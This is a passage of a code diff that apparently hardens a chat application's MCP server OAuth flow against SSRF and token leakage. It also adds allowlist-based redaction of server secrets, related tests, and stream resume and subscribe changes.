expect(redacted.iconPath).toBe('/icons/test.png'); + expect(redacted.chatMenu).toBe(true); + expect(redacted.requiresOAuth).toBe(false); + expect(redacted.capabilities).toBe('{"tools":{}}'); + expect(redacted.tools).toBe('tool_a, tool_b'); + expect(redacted.dbId).toBe('abc123'); + expect(redacted.updatedAt).toBe(1700000000000); + expect(redacted.consumeOnly).toBe(false); + expect(redacted.inspectionFailed).toBe(false); + expect(redacted.customUserVars).toEqual(config.customUserVars); + }); + + it('should pass URLs through unchanged', () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://mcp.example.com/sse?param=value', + }; + const redacted = redactServerSecrets(config); + expect(redacted.url).toBe('https://mcp.example.com/sse?param=value'); + }); + + it('should only include explicitly allowlisted fields', () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + title: 'Test', + }; + (config as Record).someNewSensitiveField = 'leaked-value'; + const redacted = redactServerSecrets(config); + expect((redacted as Record).someNewSensitiveField).toBeUndefined(); + expect(redacted.title).toBe('Test'); + }); +}); + +describe('redactAllServerSecrets', () => { + it('should redact secrets from all configs in the map', () => { + const configs: Record = { + 'server-a': { + type: 'sse', + url: 'https://a.com/mcp', + apiKey: { source: 'admin', authorization_type: 'bearer', key: 'key-a' }, + }, + 'server-b': { + type: 'sse', + url: 'https://b.com/mcp', + oauth: { client_id: 'cid-b', client_secret: 'secret-b' }, + }, + 'server-c': { + type: 'stdio', + command: 'node', + args: ['c.js'], + }, + }; + const redacted = redactAllServerSecrets(configs); + expect(redacted['server-a'].apiKey?.key).toBeUndefined(); + expect(redacted['server-a'].apiKey?.source).toBe('admin'); + expect(redacted['server-b'].oauth?.client_secret).toBeUndefined(); + expect(redacted['server-b'].oauth?.client_id).toBe('cid-b'); + 
expect((redacted['server-c'] as Record).command).toBeUndefined(); + }); +}); diff --git a/packages/api/src/mcp/oauth/handler.ts b/packages/api/src/mcp/oauth/handler.ts index 366d0d2fde..873af5c66d 100644 --- a/packages/api/src/mcp/oauth/handler.ts +++ b/packages/api/src/mcp/oauth/handler.ts @@ -24,6 +24,7 @@ import { selectRegistrationAuthMethod, inferClientAuthMethod, } from './methods'; +import { isSSRFTarget, resolveHostnameSSRF, isOAuthUrlAllowed } from '~/auth'; import { sanitizeUrlForLogging } from '~/mcp/utils'; /** Type for the OAuth metadata from the SDK */ @@ -122,6 +123,7 @@ export class MCPOAuthHandler { private static async discoverMetadata( serverUrl: string, oauthHeaders: Record, + allowedDomains?: string[] | null, ): Promise<{ metadata: OAuthMetadata; resourceMetadata?: OAuthProtectedResourceMetadata; @@ -144,7 +146,9 @@ export class MCPOAuthHandler { resourceMetadata = await discoverOAuthProtectedResourceMetadata(serverUrl, {}, fetchFn); if (resourceMetadata?.authorization_servers?.length) { - authServerUrl = new URL(resourceMetadata.authorization_servers[0]); + const discoveredAuthServer = resourceMetadata.authorization_servers[0]; + await this.validateOAuthUrl(discoveredAuthServer, 'authorization_server', allowedDomains); + authServerUrl = new URL(discoveredAuthServer); logger.debug( `[MCPOAuth] Found authorization server from resource metadata: ${authServerUrl}`, ); @@ -200,6 +204,25 @@ export class MCPOAuthHandler { logger.debug(`[MCPOAuth] OAuth metadata discovered successfully`); const metadata = await OAuthMetadataSchema.parseAsync(rawMetadata); + const endpointChecks: Promise[] = []; + if (metadata.registration_endpoint) { + endpointChecks.push( + this.validateOAuthUrl( + metadata.registration_endpoint, + 'registration_endpoint', + allowedDomains, + ), + ); + } + if (metadata.token_endpoint) { + endpointChecks.push( + this.validateOAuthUrl(metadata.token_endpoint, 'token_endpoint', allowedDomains), + ); + } + if (endpointChecks.length > 0) 
{ + await Promise.all(endpointChecks); + } + logger.debug(`[MCPOAuth] OAuth metadata parsed successfully`); return { metadata: metadata as unknown as OAuthMetadata, @@ -344,6 +367,7 @@ export class MCPOAuthHandler { userId: string, oauthHeaders: Record, config?: MCPOptions['oauth'], + allowedDomains?: string[] | null, ): Promise<{ authorizationUrl: string; flowId: string; flowMetadata: MCPOAuthFlowMetadata }> { logger.debug( `[MCPOAuth] initiateOAuthFlow called for ${serverName} with URL: ${sanitizeUrlForLogging(serverUrl)}`, @@ -355,10 +379,14 @@ export class MCPOAuthHandler { logger.debug(`[MCPOAuth] Generated flowId: ${flowId}, state: ${state}`); try { - // Check if we have pre-configured OAuth settings if (config?.authorization_url && config?.token_url && config?.client_id) { logger.debug(`[MCPOAuth] Using pre-configured OAuth settings for ${serverName}`); + await Promise.all([ + this.validateOAuthUrl(config.authorization_url, 'authorization_url', allowedDomains), + this.validateOAuthUrl(config.token_url, 'token_url', allowedDomains), + ]); + const skipCodeChallengeCheck = config?.skip_code_challenge_check === true || process.env.MCP_SKIP_CODE_CHALLENGE_CHECK === 'true'; @@ -410,10 +438,11 @@ export class MCPOAuthHandler { code_challenge_methods_supported: codeChallengeMethodsSupported, }; logger.debug(`[MCPOAuth] metadata for "${serverName}": ${JSON.stringify(metadata)}`); + const redirectUri = this.getDefaultRedirectUri(serverName); const clientInfo: OAuthClientInformation = { client_id: config.client_id, client_secret: config.client_secret, - redirect_uris: [config.redirect_uri || this.getDefaultRedirectUri(serverName)], + redirect_uris: [redirectUri], scope: config.scope, token_endpoint_auth_method: tokenEndpointAuthMethod, }; @@ -422,7 +451,7 @@ export class MCPOAuthHandler { const { authorizationUrl, codeVerifier } = await startAuthorization(serverUrl, { metadata: metadata as unknown as SDKOAuthMetadata, clientInformation: clientInfo, - redirectUrl: 
clientInfo.redirect_uris?.[0] || this.getDefaultRedirectUri(serverName), + redirectUrl: redirectUri, scope: config.scope, }); @@ -456,14 +485,14 @@ export class MCPOAuthHandler { const { metadata, resourceMetadata, authServerUrl } = await this.discoverMetadata( serverUrl, oauthHeaders, + allowedDomains, ); logger.debug( `[MCPOAuth] OAuth metadata discovered, auth server URL: ${sanitizeUrlForLogging(authServerUrl)}`, ); - /** Dynamic client registration based on the discovered metadata */ - const redirectUri = config?.redirect_uri || this.getDefaultRedirectUri(serverName); + const redirectUri = this.getDefaultRedirectUri(serverName); logger.debug(`[MCPOAuth] Registering OAuth client with redirect URI: ${redirectUri}`); const clientInfo = await this.registerOAuthClient( @@ -568,7 +597,11 @@ export class MCPOAuthHandler { } /** - * Completes the OAuth flow by exchanging the authorization code for tokens + * Completes the OAuth flow by exchanging the authorization code for tokens. + * + * `allowedDomains` is intentionally absent: all URLs used here (serverUrl, + * token_endpoint) originate from {@link MCPOAuthFlowMetadata} that was + * SSRF-validated during {@link initiateOAuthFlow}. No new URL resolution occurs. */ static async completeOAuthFlow( flowId: string, @@ -672,6 +705,36 @@ export class MCPOAuthHandler { return randomBytes(32).toString('base64url'); } + /** + * Validates an OAuth URL is not targeting a private/internal address. + * Skipped when the full URL (hostname + protocol + port) matches an admin-trusted + * allowedDomains entry, honoring protocol/port constraints when the admin specifies them. 
+ */ + private static async validateOAuthUrl( + url: string, + fieldName: string, + allowedDomains?: string[] | null, + ): Promise { + if (isOAuthUrlAllowed(url, allowedDomains)) { + return; + } + + let hostname: string; + try { + hostname = new URL(url).hostname; + } catch { + throw new Error(`Invalid OAuth ${fieldName}: ${sanitizeUrlForLogging(url)}`); + } + + if (isSSRFTarget(hostname)) { + throw new Error(`OAuth ${fieldName} targets a blocked address`); + } + + if (await resolveHostnameSSRF(hostname)) { + throw new Error(`OAuth ${fieldName} resolves to a private IP address`); + } + } + private static readonly STATE_MAP_TYPE = 'mcp_oauth_state'; /** @@ -758,9 +821,16 @@ export class MCPOAuthHandler { */ static async refreshOAuthTokens( refreshToken: string, - metadata: { serverName: string; serverUrl?: string; clientInfo?: OAuthClientInformation }, + metadata: { + serverName: string; + serverUrl?: string; + clientInfo?: OAuthClientInformation; + storedTokenEndpoint?: string; + storedAuthMethods?: string[]; + }, oauthHeaders: Record, config?: MCPOptions['oauth'], + allowedDomains?: string[] | null, ): Promise { logger.debug(`[MCPOAuth] Refreshing tokens for ${metadata.serverName}`); @@ -783,10 +853,10 @@ export class MCPOAuthHandler { scope: metadata.clientInfo.scope, }); - /** Use the stored client information and metadata to determine the token URL */ let tokenUrl: string; let authMethods: string[] | undefined; if (config?.token_url) { + await this.validateOAuthUrl(config.token_url, 'token_url', allowedDomains); tokenUrl = config.token_url; authMethods = config.token_endpoint_auth_methods_supported; } else if (!metadata.serverUrl) { @@ -798,21 +868,25 @@ export class MCPOAuthHandler { const oauthMetadata = await this.discoverWithOriginFallback(serverUrl, fetchFn); if (!oauthMetadata) { - /** - * No metadata discovered - use fallback /token endpoint. - * This mirrors the MCP SDK's behavior for legacy servers without .well-known endpoints. 
- */ - logger.warn( - `[MCPOAuth] No OAuth metadata discovered for token refresh, using fallback /token endpoint`, - ); - tokenUrl = new URL('/token', metadata.serverUrl).toString(); - authMethods = ['client_secret_basic', 'client_secret_post', 'none']; + if (metadata.storedTokenEndpoint) { + tokenUrl = metadata.storedTokenEndpoint; + authMethods = metadata.storedAuthMethods; + } else { + /** + * Do NOT fall back to `new URL('/token', metadata.serverUrl)`. + * metadata.serverUrl is the MCP resource server, which may differ from the + * authorization server. Sending refresh tokens there leaks them to the + * resource server operator when .well-known discovery is absent. + */ + throw new Error('No OAuth metadata discovered for token refresh'); + } } else if (!oauthMetadata.token_endpoint) { throw new Error('No token endpoint found in OAuth metadata'); } else { tokenUrl = oauthMetadata.token_endpoint; authMethods = oauthMetadata.token_endpoint_auth_methods_supported; } + await this.validateOAuthUrl(tokenUrl, 'token_url', allowedDomains); } const body = new URLSearchParams({ @@ -865,8 +939,8 @@ export class MCPOAuthHandler { } logger.debug(`[MCPOAuth] Refresh request to: ${sanitizeUrlForLogging(tokenUrl)}`, { - body: body.toString(), - headers, + grant_type: 'refresh_token', + has_auth_header: !!headers['Authorization'], }); const response = await fetch(tokenUrl, { @@ -886,10 +960,10 @@ export class MCPOAuthHandler { return this.processRefreshResponse(tokens, metadata.serverName, 'stored client info'); } - // Fallback: If we have pre-configured OAuth settings, use them if (config?.token_url && config?.client_id) { logger.debug(`[MCPOAuth] Using pre-configured OAuth settings for token refresh`); + await this.validateOAuthUrl(config.token_url, 'token_url', allowedDomains); const tokenUrl = new URL(config.token_url); const body = new URLSearchParams({ @@ -975,18 +1049,20 @@ export class MCPOAuthHandler { const oauthMetadata = await 
this.discoverWithOriginFallback(serverUrl, fetchFn); let tokenUrl: URL; - if (!oauthMetadata?.token_endpoint) { - /** - * No metadata or token_endpoint discovered - use fallback /token endpoint. - * This mirrors the MCP SDK's behavior for legacy servers without .well-known endpoints. - */ - logger.warn( - `[MCPOAuth] No OAuth metadata or token endpoint found, using fallback /token endpoint`, - ); - tokenUrl = new URL('/token', metadata.serverUrl); + if (!oauthMetadata) { + if (metadata.storedTokenEndpoint) { + tokenUrl = new URL(metadata.storedTokenEndpoint); + } else { + // Same rationale as the stored-clientInfo branch above: never fall back + // to metadata.serverUrl which is the MCP resource server, not the auth server. + throw new Error('No OAuth metadata discovered for token refresh'); + } + } else if (!oauthMetadata.token_endpoint) { + throw new Error('No token endpoint found in OAuth metadata'); } else { tokenUrl = new URL(oauthMetadata.token_endpoint); } + await this.validateOAuthUrl(tokenUrl.href, 'token_url', allowedDomains); const body = new URLSearchParams({ grant_type: 'refresh_token', @@ -1035,12 +1111,13 @@ export class MCPOAuthHandler { revocationEndpointAuthMethodsSupported?: string[]; }, oauthHeaders: Record = {}, + allowedDomains?: string[] | null, ): Promise { - // build the revoke URL, falling back to the server URL + /revoke if no revocation endpoint is provided const revokeUrl: URL = metadata.revocationEndpoint != null ? new URL(metadata.revocationEndpoint) : new URL('/revoke', metadata.serverUrl); + await this.validateOAuthUrl(revokeUrl.href, 'revocation_endpoint', allowedDomains); const authMethods = metadata.revocationEndpointAuthMethodsSupported ?? 
['client_secret_basic']; const authMethod = resolveTokenEndpointAuthMethod({ tokenAuthMethods: authMethods }); diff --git a/packages/api/src/mcp/oauth/tokens.ts b/packages/api/src/mcp/oauth/tokens.ts index 7b1d189347..1e31a64511 100644 --- a/packages/api/src/mcp/oauth/tokens.ts +++ b/packages/api/src/mcp/oauth/tokens.ts @@ -41,6 +41,8 @@ interface GetTokensParams { serverName: string; identifier: string; clientInfo?: OAuthClientInformation; + storedTokenEndpoint?: string; + storedAuthMethods?: string[]; }, ) => Promise; createToken?: TokenMethods['createToken']; @@ -83,46 +85,40 @@ export class MCPTokenStorage { `${logPrefix} Token expires_in: ${'expires_in' in tokens ? tokens.expires_in : 'N/A'}, expires_at: ${'expires_at' in tokens ? tokens.expires_at : 'N/A'}`, ); - // Handle both expires_in and expires_at formats + const defaultTTL = 365 * 24 * 60 * 60; + let accessTokenExpiry: Date; + let expiresInSeconds: number; if ('expires_at' in tokens && tokens.expires_at) { /** MCPOAuthTokens format - already has calculated expiry */ logger.debug(`${logPrefix} Using expires_at: ${tokens.expires_at}`); accessTokenExpiry = new Date(tokens.expires_at); + expiresInSeconds = Math.floor((accessTokenExpiry.getTime() - Date.now()) / 1000); } else if (tokens.expires_in) { - /** Standard OAuthTokens format - calculate expiry */ + /** Standard OAuthTokens format - use expires_in directly to avoid lossy Date round-trip */ logger.debug(`${logPrefix} Using expires_in: ${tokens.expires_in}`); + expiresInSeconds = tokens.expires_in; accessTokenExpiry = new Date(Date.now() + tokens.expires_in * 1000); } else { - /** No expiry provided - default to 1 year */ logger.debug(`${logPrefix} No expiry provided, using default`); - accessTokenExpiry = new Date(Date.now() + 365 * 24 * 60 * 60 * 1000); + expiresInSeconds = defaultTTL; + accessTokenExpiry = new Date(Date.now() + defaultTTL * 1000); } logger.debug(`${logPrefix} Calculated expiry date: ${accessTokenExpiry.toISOString()}`); - 
logger.debug( - `${logPrefix} Date object: ${JSON.stringify({ - time: accessTokenExpiry.getTime(), - valid: !isNaN(accessTokenExpiry.getTime()), - iso: accessTokenExpiry.toISOString(), - })}`, - ); - // Ensure the date is valid before passing to createToken if (isNaN(accessTokenExpiry.getTime())) { logger.error(`${logPrefix} Invalid expiry date calculated, using default`); - accessTokenExpiry = new Date(Date.now() + 365 * 24 * 60 * 60 * 1000); + accessTokenExpiry = new Date(Date.now() + defaultTTL * 1000); + expiresInSeconds = defaultTTL; } - // Calculate expiresIn (seconds from now) - const expiresIn = Math.floor((accessTokenExpiry.getTime() - Date.now()) / 1000); - const accessTokenData = { userId, type: 'mcp_oauth', identifier, token: encryptedAccessToken, - expiresIn: expiresIn > 0 ? expiresIn : 365 * 24 * 60 * 60, // Default to 1 year if negative + expiresIn: expiresInSeconds > 0 ? expiresInSeconds : defaultTTL, }; // Check if token already exists and update if it does @@ -312,9 +308,10 @@ export class MCPTokenStorage { logger.info(`${logPrefix} Attempting to refresh token`); const decryptedRefreshToken = await decryptV2(refreshTokenData.token); - /** Client information if available */ let clientInfo; let clientInfoData; + let storedTokenEndpoint: string | undefined; + let storedAuthMethods: string[] | undefined; try { clientInfoData = await findToken({ userId, @@ -328,6 +325,19 @@ export class MCPTokenStorage { client_id: clientInfo.client_id, has_client_secret: !!clientInfo.client_secret, }); + + if (clientInfoData.metadata) { + const raw = + clientInfoData.metadata instanceof Map + ? 
Object.fromEntries(clientInfoData.metadata) + : (clientInfoData.metadata as Record); + if (typeof raw.token_endpoint === 'string') { + storedTokenEndpoint = raw.token_endpoint; + } + if (Array.isArray(raw.token_endpoint_auth_methods_supported)) { + storedAuthMethods = raw.token_endpoint_auth_methods_supported as string[]; + } + } } } catch { logger.debug(`${logPrefix} No client info found`); @@ -338,6 +348,8 @@ export class MCPTokenStorage { serverName, identifier, clientInfo, + storedTokenEndpoint, + storedAuthMethods, }; const newTokens = await refreshTokens(decryptedRefreshToken, metadata); diff --git a/packages/api/src/mcp/registry/MCPServerInspector.ts b/packages/api/src/mcp/registry/MCPServerInspector.ts index eea52bbf2e..7f31211680 100644 --- a/packages/api/src/mcp/registry/MCPServerInspector.ts +++ b/packages/api/src/mcp/registry/MCPServerInspector.ts @@ -6,6 +6,7 @@ import { isMCPDomainAllowed, extractMCPServerDomain } from '~/auth/domain'; import { MCPConnectionFactory } from '~/mcp/MCPConnectionFactory'; import { MCPDomainNotAllowedError } from '~/mcp/errors'; import { detectOAuthRequirement } from '~/mcp/oauth'; +import { hasCustomUserVars } from '~/mcp/utils'; import { isEnabled } from '~/utils'; /** @@ -19,6 +20,7 @@ export class MCPServerInspector { private readonly config: t.ParsedServerConfig, private connection: MCPConnection | undefined, private readonly useSSRFProtection: boolean = false, + private readonly allowedDomains?: string[] | null, ) {} /** @@ -45,7 +47,13 @@ export class MCPServerInspector { const useSSRFProtection = !Array.isArray(allowedDomains) || allowedDomains.length === 0; const start = Date.now(); - const inspector = new MCPServerInspector(serverName, rawConfig, connection, useSSRFProtection); + const inspector = new MCPServerInspector( + serverName, + rawConfig, + connection, + useSSRFProtection, + allowedDomains, + ); await inspector.inspectServer(); inspector.config.initDuration = Date.now() - start; return inspector.config; 
@@ -54,7 +62,11 @@ export class MCPServerInspector { private async inspectServer(): Promise { await this.detectOAuth(); - if (this.config.startup !== false && !this.config.requiresOAuth) { + if ( + this.config.startup !== false && + !this.config.requiresOAuth && + !hasCustomUserVars(this.config) + ) { let tempConnection = false; if (!this.connection) { tempConnection = true; @@ -63,6 +75,7 @@ export class MCPServerInspector { serverName: this.serverName, dbSourced: !!this.config.dbId, useSSRFProtection: this.useSSRFProtection, + allowedDomains: this.allowedDomains, }); } diff --git a/packages/api/src/mcp/registry/__tests__/MCPServerInspector.test.ts b/packages/api/src/mcp/registry/__tests__/MCPServerInspector.test.ts index b79f2d044a..f0ab75c9b4 100644 --- a/packages/api/src/mcp/registry/__tests__/MCPServerInspector.test.ts +++ b/packages/api/src/mcp/registry/__tests__/MCPServerInspector.test.ts @@ -100,6 +100,54 @@ describe('MCPServerInspector', () => { }); }); + it('should skip capabilities fetch when customUserVars is defined', async () => { + const rawConfig: t.MCPOptions = { + type: 'stdio', + command: 'npx', + args: ['-y', '@test/mcp-stdio-server'], + env: { API_KEY: '{{MY_KEY}}' }, + customUserVars: { + MY_KEY: { title: 'API Key', description: 'Your API key' }, + }, + }; + + const result = await MCPServerInspector.inspect('test_server', rawConfig, mockConnection); + + expect(result).toEqual({ + type: 'stdio', + command: 'npx', + args: ['-y', '@test/mcp-stdio-server'], + env: { API_KEY: '{{MY_KEY}}' }, + customUserVars: { + MY_KEY: { title: 'API Key', description: 'Your API key' }, + }, + requiresOAuth: false, + initDuration: expect.any(Number), + }); + + expect(MCPConnectionFactory.create).not.toHaveBeenCalled(); + expect(mockConnection.disconnect).not.toHaveBeenCalled(); + }); + + it('should NOT create a temp connection when customUserVars is defined and no connection is provided', async () => { + const rawConfig: t.MCPOptions = { + type: 'stdio', + 
command: 'npx', + args: ['-y', '@test/mcp-stdio-server'], + env: { API_KEY: '{{MY_KEY}}' }, + customUserVars: { + MY_KEY: { title: 'API Key', description: 'Your API key' }, + }, + }; + + const result = await MCPServerInspector.inspect('test_server', rawConfig); + + expect(MCPConnectionFactory.create).not.toHaveBeenCalled(); + expect(result.requiresOAuth).toBe(false); + expect(result.capabilities).toBeUndefined(); + expect(result.toolFunctions).toBeUndefined(); + }); + it('should keep custom serverInstructions string and not fetch from server', async () => { const rawConfig: t.MCPOptions = { type: 'stdio', diff --git a/packages/api/src/mcp/registry/__tests__/ServerConfigsDB.test.ts b/packages/api/src/mcp/registry/__tests__/ServerConfigsDB.test.ts index 1c755ae0f0..38ed51cd99 100644 --- a/packages/api/src/mcp/registry/__tests__/ServerConfigsDB.test.ts +++ b/packages/api/src/mcp/registry/__tests__/ServerConfigsDB.test.ts @@ -1456,4 +1456,102 @@ describe('ServerConfigsDB', () => { expect(retrieved?.apiKey?.key).toBeUndefined(); }); }); + + describe('DB layer returns decrypted secrets (redaction is at controller layer)', () => { + it('should return decrypted apiKey.key to VIEW-only user via get()', async () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + title: 'Secret API Key Server', + apiKey: { + source: 'admin', + authorization_type: 'bearer', + key: 'admin-secret-api-key', + }, + }; + const created = await serverConfigsDB.add('temp-name', config, userId); + + const role = await mongoose.models.AccessRole.findOne({ + accessRoleId: AccessRoleIds.MCPSERVER_VIEWER, + }); + await mongoose.models.AclEntry.create({ + principalType: PrincipalType.USER, + principalModel: PrincipalModel.USER, + principalId: new mongoose.Types.ObjectId(userId2), + resourceType: ResourceType.MCPSERVER, + resourceId: new mongoose.Types.ObjectId(created.config.dbId!), + permBits: PermissionBits.VIEW, + roleId: role!._id, + grantedBy: new 
mongoose.Types.ObjectId(userId), + }); + + const result = await serverConfigsDB.get(created.serverName, userId2); + expect(result).toBeDefined(); + expect(result?.apiKey?.key).toBe('admin-secret-api-key'); + }); + + it('should return decrypted oauth.client_secret to VIEW-only user via get()', async () => { + const config = createSSEConfig('Secret OAuth Server', 'Test', { + client_id: 'my-client-id', + client_secret: 'admin-oauth-secret', + }); + const created = await serverConfigsDB.add('temp-name', config, userId); + + const role = await mongoose.models.AccessRole.findOne({ + accessRoleId: AccessRoleIds.MCPSERVER_VIEWER, + }); + await mongoose.models.AclEntry.create({ + principalType: PrincipalType.USER, + principalModel: PrincipalModel.USER, + principalId: new mongoose.Types.ObjectId(userId2), + resourceType: ResourceType.MCPSERVER, + resourceId: new mongoose.Types.ObjectId(created.config.dbId!), + permBits: PermissionBits.VIEW, + roleId: role!._id, + grantedBy: new mongoose.Types.ObjectId(userId), + }); + + const result = await serverConfigsDB.get(created.serverName, userId2); + expect(result).toBeDefined(); + expect(result?.oauth?.client_secret).toBe('admin-oauth-secret'); + }); + + it('should return decrypted secrets to VIEW-only user via getAll()', async () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + title: 'Shared Secret Server', + apiKey: { + source: 'admin', + authorization_type: 'bearer', + key: 'shared-api-key', + }, + oauth: { + client_id: 'shared-client', + client_secret: 'shared-oauth-secret', + }, + }; + const created = await serverConfigsDB.add('temp-name', config, userId); + + const role = await mongoose.models.AccessRole.findOne({ + accessRoleId: AccessRoleIds.MCPSERVER_VIEWER, + }); + await mongoose.models.AclEntry.create({ + principalType: PrincipalType.USER, + principalModel: PrincipalModel.USER, + principalId: new mongoose.Types.ObjectId(userId2), + resourceType: ResourceType.MCPSERVER, + 
resourceId: new mongoose.Types.ObjectId(created.config.dbId!), + permBits: PermissionBits.VIEW, + roleId: role!._id, + grantedBy: new mongoose.Types.ObjectId(userId), + }); + + const result = await serverConfigsDB.getAll(userId2); + const serverConfig = result[created.serverName]; + expect(serverConfig).toBeDefined(); + expect(serverConfig?.apiKey?.key).toBe('shared-api-key'); + expect(serverConfig?.oauth?.client_secret).toBe('shared-oauth-secret'); + }); + }); }); diff --git a/packages/api/src/mcp/types/index.ts b/packages/api/src/mcp/types/index.ts index bbdabb4428..0af10c7399 100644 --- a/packages/api/src/mcp/types/index.ts +++ b/packages/api/src/mcp/types/index.ts @@ -169,6 +169,7 @@ export interface BasicConnectionOptions { serverName: string; serverConfig: MCPOptions; useSSRFProtection?: boolean; + allowedDomains?: string[] | null; /** When true, only resolve customUserVars in processMCPEnv (for DB-stored servers) */ dbSourced?: boolean; } diff --git a/packages/api/src/mcp/utils.ts b/packages/api/src/mcp/utils.ts index fddebb9db3..ff367725fc 100644 --- a/packages/api/src/mcp/utils.ts +++ b/packages/api/src/mcp/utils.ts @@ -1,6 +1,71 @@ import { Constants } from 'librechat-data-provider'; +import type { ParsedServerConfig } from '~/mcp/types'; export const mcpToolPattern = new RegExp(`^.+${Constants.mcp_delimiter}.+$`); + +/** Checks that `customUserVars` is present AND non-empty (guards against truthy `{}`) */ +export function hasCustomUserVars(config: Pick): boolean { + return !!config.customUserVars && Object.keys(config.customUserVars).length > 0; +} + +/** + * Allowlist-based sanitization for API responses. Only explicitly listed fields are included; + * new fields added to ParsedServerConfig are excluded by default until allowlisted here. + * + * URLs are returned as-is: DB-stored configs reject ${VAR} patterns at validation time + * (MCPServerUserInputSchema), and YAML configs are admin-managed. 
Env variable resolution + * is handled at the schema/input boundary, not the output boundary. + */ +export function redactServerSecrets(config: ParsedServerConfig): Partial { + const safe: Partial = { + type: config.type, + url: config.url, + title: config.title, + description: config.description, + iconPath: config.iconPath, + chatMenu: config.chatMenu, + requiresOAuth: config.requiresOAuth, + capabilities: config.capabilities, + tools: config.tools, + toolFunctions: config.toolFunctions, + initDuration: config.initDuration, + updatedAt: config.updatedAt, + dbId: config.dbId, + consumeOnly: config.consumeOnly, + inspectionFailed: config.inspectionFailed, + customUserVars: config.customUserVars, + serverInstructions: config.serverInstructions, + }; + + if (config.apiKey) { + safe.apiKey = { + source: config.apiKey.source, + authorization_type: config.apiKey.authorization_type, + ...(config.apiKey.custom_header && { custom_header: config.apiKey.custom_header }), + }; + } + + if (config.oauth) { + const { client_secret: _secret, ...safeOAuth } = config.oauth; + safe.oauth = safeOAuth; + } + + return Object.fromEntries( + Object.entries(safe).filter(([, v]) => v !== undefined), + ) as Partial; +} + +/** Applies allowlist-based sanitization to a map of server configs. 
*/ +export function redactAllServerSecrets( + configs: Record, +): Record> { + const result: Record> = {}; + for (const [key, config] of Object.entries(configs)) { + result[key] = redactServerSecrets(config); + } + return result; +} + /** * Normalizes a server name to match the pattern ^[a-zA-Z0-9_.-]+$ * This is required for Azure OpenAI models with Tool Calling diff --git a/packages/api/src/stream/GenerationJobManager.ts b/packages/api/src/stream/GenerationJobManager.ts index cd5ff04eb0..3e04ab734b 100644 --- a/packages/api/src/stream/GenerationJobManager.ts +++ b/packages/api/src/stream/GenerationJobManager.ts @@ -656,7 +656,7 @@ class GenerationJobManagerClass { aborted: true, // Flag for early abort - no messages saved, frontend should go to new chat earlyAbort: isEarlyAbort, - } as unknown as t.ServerSentEvent; + } satisfies t.FinalEvent as t.ServerSentEvent; if (runtime) { runtime.finalEvent = abortFinalEvent; @@ -707,6 +707,10 @@ class GenerationJobManagerClass { * @param onChunk - Handler for chunk events (streamed tokens, run steps, etc.) * @param onDone - Handler for completion event (includes final message) * @param onError - Handler for error events + * @param options - Subscription configuration + * @param options.skipBufferReplay - When true, skips replaying the earlyEventBuffer. + * Use this when a sync event was already sent (resume), since the sync's + * aggregatedContent already includes all buffered events. 
* @returns Subscription object with unsubscribe function, or null if job not found */ async subscribe( @@ -714,6 +718,7 @@ class GenerationJobManagerClass { onChunk: t.ChunkHandler, onDone?: t.DoneHandler, onError?: t.ErrorHandler, + options?: t.SubscribeOptions, ): Promise<{ unsubscribe: t.UnsubscribeFn } | null> { // Use lazy initialization to support cross-replica subscriptions const runtime = await this.getOrCreateRuntimeState(streamId); @@ -763,13 +768,40 @@ class GenerationJobManagerClass { runtime.hasSubscriber = true; if (runtime.earlyEventBuffer.length > 0) { - logger.debug( - `[GenerationJobManager] Replaying ${runtime.earlyEventBuffer.length} buffered events for ${streamId}`, - ); - for (const bufferedEvent of runtime.earlyEventBuffer) { - onChunk(bufferedEvent); + if (options?.skipBufferReplay) { + logger.debug( + `[GenerationJobManager] Skipping ${runtime.earlyEventBuffer.length} buffered events for ${streamId} (skipBufferReplay)`, + ); + } else { + logger.debug( + `[GenerationJobManager] Replaying ${runtime.earlyEventBuffer.length} buffered events for ${streamId}`, + ); + for (const bufferedEvent of runtime.earlyEventBuffer) { + onChunk(bufferedEvent); + } } runtime.earlyEventBuffer = []; + } else if (this._isRedis && !options?.skipBufferReplay && jobData?.userMessage) { + /** + * Cross-replica fallback: the created event was buffered on the generating + * instance and published via Redis pub/sub before this subscriber was active. + * Reconstruct from persisted metadata. Only fields stored by trackUserMessage() + * are available (messageId, parentMessageId, conversationId, text); + * sender/isCreatedByUser are invariant for user messages and added back here. 
+ */ + logger.debug( + `[GenerationJobManager] Cross-replica subscribe: emitting created event from metadata for ${streamId}`, + ); + const createdEvent: t.CreatedEvent = { + created: true, + message: { + ...jobData.userMessage, + sender: 'User', + isCreatedByUser: true, + }, + streamId, + }; + onChunk(createdEvent); } this.eventTransport.syncReorderBuffer?.(streamId); @@ -785,6 +817,52 @@ class GenerationJobManagerClass { return subscription; } + /** + * Atomic resume + subscribe: snapshots resume state and drains the early event buffer + * in one synchronous step, then subscribes with skipBufferReplay. + * + * Closes the timing gap between separate `getResumeState()` and `subscribe()` calls + * where events could arrive in earlyEventBuffer after the snapshot but before subscribe + * clears the buffer. + * + * In-memory mode: drained buffer events are returned as `pendingEvents` since + * they exist nowhere else. The caller must deliver them after the sync payload. + * Redis mode: `pendingEvents` is empty — chunks are persisted via appendChunk + * and will appear in aggregatedContent on the next resume. + */ + async subscribeWithResume( + streamId: string, + onChunk: t.ChunkHandler, + onDone?: t.DoneHandler, + onError?: t.ErrorHandler, + ): Promise { + const bufferLengthAtSnapshot = !this._isRedis + ? (this.runtimeState.get(streamId)?.earlyEventBuffer.length ?? 
0) + : 0; + + const resumeState = await this.getResumeState(streamId); + + let pendingEvents: t.ServerSentEvent[] = []; + if (!this._isRedis) { + const runtime = this.runtimeState.get(streamId); + if (runtime) { + pendingEvents = runtime.earlyEventBuffer.slice(bufferLengthAtSnapshot); + runtime.earlyEventBuffer = []; + if (pendingEvents.length > 0) { + logger.debug( + `[GenerationJobManager] Captured ${pendingEvents.length} gap events for ${streamId}`, + ); + } + } + } + + const subscription = await this.subscribe(streamId, onChunk, onDone, onError, { + skipBufferReplay: true, + }); + + return { subscription, resumeState, pendingEvents }; + } + /** * Emit a chunk event to all subscribers. * Uses runtime state check for performance (avoids async job store lookup per token). @@ -801,8 +879,7 @@ class GenerationJobManagerClass { return; } - // Track user message from created event - this.trackUserMessage(streamId, event); + await this.trackUserMessage(streamId, event); // For Redis mode, persist chunk for later reconstruction (fire-and-forget for resumability) if (this._isRedis) { @@ -886,29 +963,31 @@ class GenerationJobManagerClass { } /** - * Track user message from created event. + * Persist user message metadata from the created event. + 